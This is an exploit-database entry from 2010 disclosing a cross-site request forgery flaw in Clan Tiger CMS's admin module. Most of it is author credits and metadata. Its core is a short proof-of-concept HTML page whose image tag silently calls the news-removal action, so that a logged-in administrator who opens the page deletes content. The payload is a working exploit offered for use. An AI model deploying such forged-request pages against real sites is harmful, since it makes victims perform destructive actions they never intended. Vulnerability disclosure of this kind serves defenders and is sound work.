Clain_TIger_CMS - Cross-Site Request Forgery

Author: pratul agrawal
type: webapps
platform: php
port: 
date_added: 2010-03-16 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

=======================================================================

                   Clain_TIger_CMS CSRF Vulnerability

                                =======================================================================

  # Vulnerability found in- Admin module
  # email         Pratulag@yahoo.com
  # company       aksitservices
  # Credit by     Pratul Agrawal
  # Software      Clan Tiger_CMS
  # Category  	  CMS / Portals
  # Site p4ge     http://server/clantiger/index.php?module=login
  # Greetz to     Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)



  #  Proof of concept   #

  Targeted URL:  http://servername/clantiger/


   Script to Delete the News content through Cross Site request forgery

             .  ................................................................................................................

                        <html>

                          <body>

                              <img src=http://server/clantiger/index.php?module=news&action=remove&id=[user ID] />

                          </body>

                        </html>

             .  ..................................................................................................................



  After execution refresh the page and u can see that a added content is deleted automatically.